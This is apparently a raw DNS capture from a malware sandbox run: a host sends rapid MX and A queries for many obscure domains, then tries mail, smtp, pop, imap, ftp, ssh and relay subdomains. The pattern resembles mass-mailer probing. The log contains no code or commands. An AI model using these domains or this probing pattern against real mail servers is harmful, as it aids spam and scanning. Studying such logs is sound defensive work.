Nov 30, 2023 11:23:13.004564047 CET	192.168.2.4	1.1.1.1	0xe52f	Standard query (0)	relay.bnder.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:14.471244097 CET	192.168.2.4	1.1.1.1	0x40fe	Standard query (0)	ftp.hna.be	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:14.482491016 CET	192.168.2.4	1.1.1.1	0xbb7	Standard query (0)	ftp.nrnet.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:14.703320980 CET	192.168.2.4	1.1.1.1	0x95b5	Standard query (0)	ftp.gco.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:14.749533892 CET	192.168.2.4	1.1.1.1	0x40fe	Standard query (0)	ftp.hna.be	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:14.814932108 CET	192.168.2.4	1.1.1.1	0xf678	Standard query (0)	ftp.cm.cz	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:14.869443893 CET	192.168.2.4	1.1.1.1	0x37c5	Standard query (0)	ftp.ia.eu	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:14.871773005 CET	192.168.2.4	1.1.1.1	0x9eb6	Standard query (0)	ftp.1.tv	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:14.912906885 CET	192.168.2.4	1.1.1.1	0xd630	Standard query (0)	ftp.san.ee	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:14.913506031 CET	192.168.2.4	1.1.1.1	0x734e	Standard query (0)	ftp.gcann.cr.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:15.008434057 CET	192.168.2.4	1.1.1.1	0x71ae	Standard query (0)	minstugml.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:15.118993998 CET	192.168.2.4	1.1.1.1	0x50b7	Standard query (0)	minstugml.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:15.121226072 CET	192.168.2.4	1.1.1.1	0xf678	Standard query (0)	ftp.cm.cz	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:15.164921045 CET	192.168.2.4	1.1.1.1	0x7b1b	Standard query (0)	ftp.gmo.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:15.201446056 CET	192.168.2.4	1.1.1.1	0xd630	Standard query (0)	ftp.san.ee	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:15.254937887 CET	192.168.2.4	1.1.1.1	0x626f	Standard query (0)	mail.ia.eu	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:15.289345980 CET	192.168.2.4	1.1.1.1	0x9106	Standard query (0)	ftp.gr.2mail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:15.289664030 CET	192.168.2.4	1.1.1.1	0xe2e	Standard query (0)	ftp.apee.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:15.292316914 CET	192.168.2.4	1.1.1.1	0xf36b	Standard query (0)	ftp.gbya.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:15.292906046 CET	192.168.2.4	1.1.1.1	0xd5cd	Standard query (0)	ftp.gmaso.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:15.294364929 CET	192.168.2.4	1.1.1.1	0xeab1	Standard query (0)	ftp.il.cm	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:15.365694046 CET	192.168.2.4	1.1.1.1	0x7b2e	Standard query (0)	ftp.z-a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:15.374208927 CET	192.168.2.4	1.1.1.1	0x1cb8	Standard query (0)	ftp.onlist.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:15.468801022 CET	192.168.2.4	1.1.1.1	0x37ca	Standard query (0)	ftp.minstugml.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:15.492090940 CET	192.168.2.4	1.1.1.1	0xa800	Standard query (0)	mail.gmaso.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:15.501065016 CET	192.168.2.4	1.1.1.1	0x82a3	Standard query (0)	mail.minstugml.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:15.513776064 CET	192.168.2.4	1.1.1.1	0x626f	Standard query (0)	mail.ia.eu	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:15.533555984 CET	192.168.2.4	1.1.1.1	0xf7f5	Standard query (0)	ssh.minstugml.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:15.550862074 CET	192.168.2.4	1.1.1.1	0xe2e	Standard query (0)	ftp.apee.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:15.581366062 CET	192.168.2.4	1.1.1.1	0x982f	Standard query (0)	mail.gcann.cr.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:15.581366062 CET	192.168.2.4	1.1.1.1	0xeab1	Standard query (0)	ftp.il.cm	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:15.581366062 CET	192.168.2.4	1.1.1.1	0xd5cd	Standard query (0)	ftp.gmaso.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:15.593285084 CET	192.168.2.4	1.1.1.1	0x6fea	Standard query (0)	mail.hna.be	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:15.743278027 CET	192.168.2.4	1.1.1.1	0x37ca	Standard query (0)	ftp.minstugml.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:15.743278027 CET	192.168.2.4	1.1.1.1	0xa800	Standard query (0)	mail.gmaso.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:15.786652088 CET	192.168.2.4	1.1.1.1	0x3fc4	Standard query (0)	pop.minstugml.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:15.788109064 CET	192.168.2.4	1.1.1.1	0x8b13	Standard query (0)	imap.minstugml.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:15.839286089 CET	192.168.2.4	1.1.1.1	0x982f	Standard query (0)	mail.gcann.cr.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:15.855249882 CET	192.168.2.4	1.1.1.1	0xf2aa	Standard query (0)	pop.hna.be	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:15.923273087 CET	192.168.2.4	1.1.1.1	0x560e	Standard query (0)	smtp.minstugml.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:16.057261944 CET	192.168.2.4	1.1.1.1	0xed7a	Standard query (0)	mailgate.minstugml.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:16.110184908 CET	192.168.2.4	1.1.1.1	0x886d	Standard query (0)	pop.gmaso.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:16.110184908 CET	192.168.2.4	1.1.1.1	0x24f7	Standard query (0)	pop3.minstugml.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:16.121264935 CET	192.168.2.4	1.1.1.1	0xf2aa	Standard query (0)	pop.hna.be	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:16.227210045 CET	192.168.2.4	1.1.1.1	0xea54	Standard query (0)	pop3.hna.be	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:16.347954988 CET	192.168.2.4	1.1.1.1	0x165b	Standard query (0)	relay.minstugml.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:16.371211052 CET	192.168.2.4	1.1.1.1	0x886d	Standard query (0)	pop.gmaso.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:16.383215904 CET	192.168.2.4	1.1.1.1	0xe0a5	Standard query (0)	cjmjizaloltmm.ch	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:16.419290066 CET	192.168.2.4	1.1.1.1	0x5f3e	Standard query (0)	cjmjizaloltmm.ch	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:16.482254982 CET	192.168.2.4	1.1.1.1	0xea54	Standard query (0)	pop3.hna.be	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:16.488352060 CET	192.168.2.4	1.1.1.1	0xaa9f	Standard query (0)	aspmx3.googlemail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:16.556607962 CET	192.168.2.4	1.1.1.1	0x2b1c	Standard query (0)	mail.gbya.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:16.671767950 CET	192.168.2.4	1.1.1.1	0x99c3	Standard query (0)	mailgate.hna.be	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:16.671828032 CET	192.168.2.4	1.1.1.1	0x5f3e	Standard query (0)	cjmjizaloltmm.ch	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:16.744483948 CET	192.168.2.4	1.1.1.1	0x5deb	Standard query (0)	pop3.gmaso.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:16.819489002 CET	192.168.2.4	1.1.1.1	0x7559	Standard query (0)	ftp.cjmjizaloltmm.ch	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:16.848718882 CET	192.168.2.4	1.1.1.1	0x1c9c	Standard query (0)	mail.cjmjizaloltmm.ch	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:16.883044958 CET	192.168.2.4	1.1.1.1	0x1e8e	Standard query (0)	ssh.cjmjizaloltmm.ch	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:16.932483912 CET	192.168.2.4	1.1.1.1	0xab9f	Standard query (0)	mailgate.hul.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:16.951227903 CET	192.168.2.4	1.1.1.1	0x99c3	Standard query (0)	mailgate.hna.be	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:16.983966112 CET	192.168.2.4	1.1.1.1	0x5deb	Standard query (0)	pop3.gmaso.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:17.167552948 CET	192.168.2.4	1.1.1.1	0x477c	Standard query (0)	pop.cjmjizaloltmm.ch	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:17.177129984 CET	192.168.2.4	1.1.1.1	0xb08b	Standard query (0)	igarraail.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:17.226874113 CET	192.168.2.4	1.1.1.1	0xab9f	Standard query (0)	mailgate.hul.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:17.252535105 CET	192.168.2.4	1.1.1.1	0x183f	Standard query (0)	mailgate.gmaso.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:17.261276007 CET	192.168.2.4	1.1.1.1	0x516d	Standard query (0)	il.comuk	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:17.272178888 CET	192.168.2.4	1.1.1.1	0x105e	Standard query (0)	imap.cjmjizaloltmm.ch	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:17.285010099 CET	192.168.2.4	1.1.1.1	0xe64c	Standard query (0)	igarraail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:17.349164009 CET	192.168.2.4	1.1.1.1	0x1bf7	Standard query (0)	il.comuk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:17.371098042 CET	192.168.2.4	1.1.1.1	0x9c82	Standard query (0)	y.itm98jca.dycandy11221000lil.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:17.372277021 CET	192.168.2.4	1.1.1.1	0xf751	Standard query (0)	hieta.g12a.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:17.413918018 CET	192.168.2.4	1.1.1.1	0x62e4	Standard query (0)	mail.gco.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:17.515523911 CET	192.168.2.4	1.1.1.1	0x366a	Standard query (0)	y.itm98jca.dycandy11221000lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:17.518802881 CET	192.168.2.4	1.1.1.1	0x8da0	Standard query (0)	hieta.g12a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:17.531331062 CET	192.168.2.4	1.1.1.1	0x183f	Standard query (0)	mailgate.gmaso.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:17.546956062 CET	192.168.2.4	1.1.1.1	0xd24a	Standard query (0)	relay.hna.be	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:17.614712954 CET	192.168.2.4	1.1.1.1	0xda59	Standard query (0)	pop3.cjmjizaloltmm.ch	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:17.657310009 CET	192.168.2.4	1.1.1.1	0xc05c	Standard query (0)	mail.igarraail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:17.667268038 CET	192.168.2.4	1.1.1.1	0x17d9	Standard query (0)	ftp.igarraail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:17.689778090 CET	192.168.2.4	1.1.1.1	0xf751	Standard query (0)	hieta.g12a.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:17.689778090 CET	192.168.2.4	1.1.1.1	0x1eb2	Standard query (0)	smtp.cjmjizaloltmm.ch	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:17.689778090 CET	192.168.2.4	1.1.1.1	0x62e4	Standard query (0)	mail.gco.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:17.731272936 CET	192.168.2.4	1.1.1.1	0x361b	Standard query (0)	ftp.il.comuk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:17.753264904 CET	192.168.2.4	1.1.1.1	0xa0c2	Standard query (0)	mail.il.comuk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:17.768481016 CET	192.168.2.4	1.1.1.1	0xae6b	Standard query (0)	mailgate.cjmjizaloltmm.ch	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:17.768481016 CET	192.168.2.4	1.1.1.1	0x810	Standard query (0)	mail.gmo.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:17.768481016 CET	192.168.2.4	1.1.1.1	0xe754	Standard query (0)	ssh.igarraail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:17.788599968 CET	192.168.2.4	1.1.1.1	0x9220	Standard query (0)	ssh.il.comuk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:17.813476086 CET	192.168.2.4	1.1.1.1	0x8da0	Standard query (0)	hieta.g12a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:17.872956038 CET	192.168.2.4	1.1.1.1	0x6f9c	Standard query (0)	ftp.y.itm98jca.dycandy11221000lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:17.897227049 CET	192.168.2.4	1.1.1.1	0x4bb1	Standard query (0)	mail.y.itm98jca.dycandy11221000lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:17.897227049 CET	192.168.2.4	1.1.1.1	0x3d89	Standard query (0)	relay.gmaso.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:17.897227049 CET	192.168.2.4	1.1.1.1	0x6dfb	Standard query (0)	alt1.gmr-smtp-in.l.google.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:17.899522066 CET	192.168.2.4	1.1.1.1	0x8fa8	Standard query (0)	ssh.y.itm98jca.dycandy11221000lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:18.019383907 CET	192.168.2.4	1.1.1.1	0x17e6	Standard query (0)	pop.gco.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:18.019383907 CET	192.168.2.4	1.1.1.1	0xb393	Standard query (0)	pop.il.comuk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:18.035346985 CET	192.168.2.4	1.1.1.1	0xb9a6	Standard query (0)	pop.igarraail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:18.059377909 CET	192.168.2.4	1.1.1.1	0x7084	Standard query (0)	imap.gco.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:18.059377909 CET	192.168.2.4	1.1.1.1	0xfcf2	Standard query (0)	imap.il.comuk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:18.085282087 CET	192.168.2.4	1.1.1.1	0xa76c	Standard query (0)	relay.cjmjizaloltmm.ch	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:18.085282087 CET	192.168.2.4	1.1.1.1	0x1cae	Standard query (0)	imap.igarraail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:18.160432100 CET	192.168.2.4	1.1.1.1	0x3d89	Standard query (0)	relay.gmaso.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:18.184801102 CET	192.168.2.4	1.1.1.1	0xe4a6	Standard query (0)	pop.y.itm98jca.dycandy11221000lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:18.187305927 CET	192.168.2.4	1.1.1.1	0x797b	Standard query (0)	ftp.hieta.g12a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:18.210051060 CET	192.168.2.4	1.1.1.1	0x532	Standard query (0)	mail.hieta.g12a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:18.212121010 CET	192.168.2.4	1.1.1.1	0x33a9	Standard query (0)	imap.y.itm98jca.dycandy11221000lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:18.235268116 CET	192.168.2.4	1.1.1.1	0xca0d	Standard query (0)	ssh.hieta.g12a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:18.251313925 CET	192.168.2.4	1.1.1.1	0xe62f	Standard query (0)	pop3.il.comuk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:18.307285070 CET	192.168.2.4	1.1.1.1	0xf471	Standard query (0)	smtp.igarraail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:18.325782061 CET	192.168.2.4	1.1.1.1	0x7084	Standard query (0)	imap.gco.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:18.326041937 CET	192.168.2.4	1.1.1.1	0x189a	Standard query (0)	smtp.il.comuk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:18.331367970 CET	192.168.2.4	1.1.1.1	0x1098	Standard query (0)	pop3.gco.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:18.359369040 CET	192.168.2.4	1.1.1.1	0x43af	Standard query (0)	mailgate.il.comuk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:18.367269993 CET	192.168.2.4	1.1.1.1	0x76aa	Standard query (0)	pop3.igarraail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:18.481395006 CET	192.168.2.4	1.1.1.1	0x797b	Standard query (0)	ftp.hieta.g12a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:18.481395006 CET	192.168.2.4	1.1.1.1	0x532	Standard query (0)	mail.hieta.g12a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:18.481462955 CET	192.168.2.4	1.1.1.1	0xca0d	Standard query (0)	ssh.hieta.g12a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:18.510624886 CET	192.168.2.4	1.1.1.1	0x6f73	Standard query (0)	smtp.y.itm98jca.dycandy11221000lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:18.530275106 CET	192.168.2.4	1.1.1.1	0xc579	Standard query (0)	mailgate.igarraail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:18.596059084 CET	192.168.2.4	1.1.1.1	0xc3a7	Standard query (0)	pop3.y.itm98jca.dycandy11221000lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:18.609289885 CET	192.168.2.4	1.1.1.1	0x1098	Standard query (0)	pop3.gco.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:18.668454885 CET	192.168.2.4	1.1.1.1	0x46b7	Standard query (0)	mailgate.y.itm98jca.dycandy11221000lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:18.701459885 CET	192.168.2.4	1.1.1.1	0xb1bd	Standard query (0)	relay.il.comuk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:18.741461039 CET	192.168.2.4	1.1.1.1	0xc61f	Standard query (0)	mailgate.gco.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:18.783020973 CET	192.168.2.4	1.1.1.1	0x624	Standard query (0)	relay.igarraail.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:18.787070036 CET	192.168.2.4	1.1.1.1	0x6f73	Standard query (0)	smtp.y.itm98jca.dycandy11221000lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:18.937362909 CET	192.168.2.4	1.1.1.1	0x36a4	Standard query (0)	relay.y.itm98jca.dycandy11221000lil.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:18.976608038 CET	192.168.2.4	1.1.1.1	0xa1d9	Standard query (0)	o.tv	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:19.101984024 CET	192.168.2.4	1.1.1.1	0x6756	Standard query (0)	o.tv	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:19.194466114 CET	192.168.2.4	1.1.1.1	0x8ee6	Standard query (0)	relay.gco.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:19.214998007 CET	192.168.2.4	1.1.1.1	0xa1d9	Standard query (0)	o.tv	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:19.251125097 CET	192.168.2.4	1.1.1.1	0x4b94	Standard query (0)	pop.hieta.g12a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:19.346930981 CET	192.168.2.4	1.1.1.1	0x6756	Standard query (0)	o.tv	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:19.396671057 CET	192.168.2.4	1.1.1.1	0xded8	Standard query (0)	imap.hieta.g12a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:19.436304092 CET	192.168.2.4	1.1.1.1	0x8ee6	Standard query (0)	relay.gco.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:19.515818119 CET	192.168.2.4	1.1.1.1	0x4b94	Standard query (0)	pop.hieta.g12a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:19.595273972 CET	192.168.2.4	1.1.1.1	0x711d	Standard query (0)	smtp.hieta.g12a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:19.640372038 CET	192.168.2.4	1.1.1.1	0xded8	Standard query (0)	imap.hieta.g12a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:19.677262068 CET	192.168.2.4	1.1.1.1	0x1a63	Standard query (0)	pop3.hieta.g12a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:19.765779972 CET	192.168.2.4	1.1.1.1	0x48b	Standard query (0)	x.oli.co.uk	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:19.791049957 CET	192.168.2.4	1.1.1.1	0x7aa4	Standard query (0)	yahcl.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:19.812565088 CET	192.168.2.4	1.1.1.1	0x4d5f	Standard query (0)	x.oli.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:19.823256016 CET	192.168.2.4	1.1.1.1	0xd01e	Standard query (0)	yahcl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:19.856609106 CET	192.168.2.4	1.1.1.1	0x711d	Standard query (0)	smtp.hieta.g12a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:19.874502897 CET	192.168.2.4	1.1.1.1	0x146a	Standard query (0)	dnujaicl.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:19.917097092 CET	192.168.2.4	1.1.1.1	0xb537	Standard query (0)	dnujaicl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:19.942461014 CET	192.168.2.4	1.1.1.1	0x82ef	Standard query (0)	asjikl.com	MX (Mail exchange)	IN (0x0001)	false
Nov 30, 2023 11:23:19.942461014 CET	192.168.2.4	1.1.1.1	0x1a63	Standard query (0)	pop3.hieta.g12a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:19.986831903 CET	192.168.2.4	1.1.1.1	0xfd7	Standard query (0)	asjikl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:20.102766037 CET	192.168.2.4	1.1.1.1	0x2eff	Standard query (0)	pop3.hul.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:20.129249096 CET	192.168.2.4	1.1.1.1	0xab14	Standard query (0)	ftp.x.oli.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:20.146805048 CET	192.168.2.4	1.1.1.1	0xf995	Standard query (0)	mail.x.oli.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:20.198990107 CET	192.168.2.4	1.1.1.1	0x3bc4	Standard query (0)	ftp.yahcl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:20.213982105 CET	192.168.2.4	1.1.1.1	0x9bff	Standard query (0)	mail.yahcl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:20.246972084 CET	192.168.2.4	1.1.1.1	0x9aee	Standard query (0)	ssh.x.oli.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:20.249268055 CET	192.168.2.4	1.1.1.1	0xdf36	Standard query (0)	www.o.tv	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:20.249268055 CET	192.168.2.4	1.1.1.1	0x19f6	Standard query (0)	ftp.noweco.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:20.266251087 CET	192.168.2.4	1.1.1.1	0x42d7	Standard query (0)	ssh.yahcl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:20.279629946 CET	192.168.2.4	1.1.1.1	0x427	Standard query (0)	ftp.dnujaicl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:20.307356119 CET	192.168.2.4	1.1.1.1	0x13b7	Standard query (0)	ftp.asjikl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:20.334322929 CET	192.168.2.4	1.1.1.1	0xd191	Standard query (0)	ssh.dnujaicl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:20.334322929 CET	192.168.2.4	1.1.1.1	0x9152	Standard query (0)	mail.dnujaicl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:20.337270975 CET	192.168.2.4	1.1.1.1	0x624c	Standard query (0)	ssh.asjikl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:20.362721920 CET	192.168.2.4	1.1.1.1	0x2fc0	Standard query (0)	mail.asjikl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:20.450244904 CET	192.168.2.4	1.1.1.1	0x3bc4	Standard query (0)	ftp.yahcl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:20.453282118 CET	192.168.2.4	1.1.1.1	0x7de3	Standard query (0)	pop.yahcl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:20.494714975 CET	192.168.2.4	1.1.1.1	0xff6d	Standard query (0)	pop.x.oli.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:20.494714975 CET	192.168.2.4	1.1.1.1	0x1990	Standard query (0)	imap.yahcl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:20.513113022 CET	192.168.2.4	1.1.1.1	0xdf36	Standard query (0)	www.o.tv	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:20.513113022 CET	192.168.2.4	1.1.1.1	0x19f6	Standard query (0)	ftp.noweco.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:20.539241076 CET	192.168.2.4	1.1.1.1	0x52ca	Standard query (0)	imap.x.oli.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:20.542196035 CET	192.168.2.4	1.1.1.1	0xafe3	Standard query (0)	mailgate.hieta.g12a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:20.565799952 CET	192.168.2.4	1.1.1.1	0x657a	Standard query (0)	pop.dnujaicl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:20.649878025 CET	192.168.2.4	1.1.1.1	0x1cbb	Standard query (0)	pop.asjikl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:20.660851002 CET	192.168.2.4	1.1.1.1	0x87d8	Standard query (0)	imap.dnujaicl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:20.697468996 CET	192.168.2.4	1.1.1.1	0xe8e9	Standard query (0)	smtp.x.oli.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:20.749191999 CET	192.168.2.4	1.1.1.1	0xa5b2	Standard query (0)	pop3.yahcl.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:20.765968084 CET	192.168.2.4	1.1.1.1	0x8cef	Standard query (0)	pop3.x.oli.co.uk	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:20.797811985 CET	192.168.2.4	1.1.1.1	0xafe3	Standard query (0)	mailgate.hieta.g12a.com	A (IP address)	IN (0x0001)	false
Nov 30, 2023 11:23:20.798927069 CET	192.168.2.4	1.1.1.1	0xfbf	Standard query (0)	imap.asjikl.com	A (IP address)	IN (0x0001)	false
